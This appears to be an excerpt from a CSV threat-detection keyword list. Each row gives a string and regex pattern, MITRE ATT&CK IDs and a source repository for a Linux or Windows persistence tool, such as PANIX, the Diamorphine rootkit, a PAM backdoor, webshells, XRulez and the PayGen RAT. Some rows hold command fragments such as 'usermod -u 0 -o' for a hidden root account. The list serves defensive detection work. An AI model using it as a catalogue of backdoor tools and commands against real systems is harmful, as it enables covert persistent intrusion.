"*usage_malicious_docker_container*",".{0,1000}usage_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_malicious_package*",".{0,1000}usage_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_motd_backdoor*",".{0,1000}usage_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_package_manager_persistence*",".{0,1000}usage_package_manager_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_rc_local_backdoor*",".{0,1000}usage_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_sudoers_backdoor*",".{0,1000}usage_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_suid_backdoor*",".{0,1000}usage_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usage_system_binary_backdoor*",".{0,1000}usage_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*usermod -u 0 -o *",".{0,1000}usermod\s\-u\s0\s\-o\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*UserPassBruteForce*",".{0,1000}UserPassBruteForce.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*Using technique (hiding scheduled task) requires NT AUTHORITY*",".{0,1000}Using\stechnique\s\(hiding\sscheduled\stask\)\srequires\sNT\sAUTHORITY.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*vim /etc/ssh/sshd_config*",".{0,1000}vim\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - couldbe an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","#linux","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*VirTool:MSIL/Sabakz.A!MTB*",".{0,1000}VirTool\:MSIL\/Sabakz\.A!MTB.{0,1000}","signature_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#Avsignature","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*W32/EarthWorm*",".{0,1000}W32\/EarthWorm.{0,1000}","signature_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#Avsignature","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*Welcome to wso webshell *",".{0,1000}Welcome\sto\swso\swebshell\s.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*Win.Packed.Seatbelt-*",".{0,1000}Win\.Packed\.Seatbelt\-.{0,1000}","signature_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#Avsignature","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*'Win32_Backdoor'*",".{0,1000}\'Win32_Backdoor\'.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*Windows.Hacktool.Seatbelt*",".{0,1000}Windows\.Hacktool\.Seatbelt.{0,1000}","signature_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#Avsignature","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*Windows/System32/cmdlol.exe*",".{0,1000}Windows\/System32\/cmdlol\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*WMI KeeTheifLurker *",".{0,1000}WMI\sKeeTheifLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*WMI KeeTheifLurker * Created*",".{0,1000}WMI\sKeeTheifLurker\s.{0,1000}\sCreated.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*WMIBackdoor.ps1*",".{0,1000}WMIBackdoor\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","10","4","316","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z"
"*WMIPersist.*",".{0,1000}WMIPersist\..{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","112","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z"
"*writing-rootkit.txt*",".{0,1000}writing\-rootkit\.txt.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*WSAAcceptBackdoor-master.zip*",".{0,1000}WSAAcceptBackdoor\-master\.zip.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*XRMod_h64e.exe*",".{0,1000}XRMod_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*Xrulez + XRMod.rwdi.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*Xrulez + XRMod.x64.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*Xrulez + XRMod.x86.binaries.zip*",".{0,1000}Xrulez\s\+\sXRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez binaries.zip*",".{0,1000}XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez.%2B.XRMod.rwdi.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.rwdi\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez.%2B.XRMod.x64.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x64\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez.%2B.XRMod.x86.binaries.zip*",".{0,1000}XRulez\.\%2B\.XRMod\.x86\.binaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez.+.XRMod.x64.binaries*",".{0,1000}XRulez\.\+\.XRMod\.x64\.binaries.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez.exe *",".{0,1000}XRulez\.exe\s.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez_h64d.dll*",".{0,1000}XRulez_h64d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez_h64e.exe*",".{0,1000}XRulez_h64e\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulez_rwdi86d.dll*",".{0,1000}XRulez_rwdi86d\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*XRulezDll_rwdi64.dll*",".{0,1000}XRulezDll_rwdi64\.dll.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*You do not have sufficient permission to hide the scheduled task*",".{0,1000}You\sdo\snot\shave\ssufficient\spermission\sto\shide\sthe\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*youhacker55/PayGen*",".{0,1000}youhacker55\/PayGen.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z"
"*Yourman.sh Mini Shell*",".{0,1000}Yourman\.sh\sMini\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*zephrax/linux-pam-backdoor*",".{0,1000}zephrax\/linux\-pam\-backdoor.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","320","83","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*ZEROSHELL | ZEROSTORE*",".{0,1000}ZEROSHELL\s\|\sZEROSTORE.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"cd PayGen","cd\sPayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z"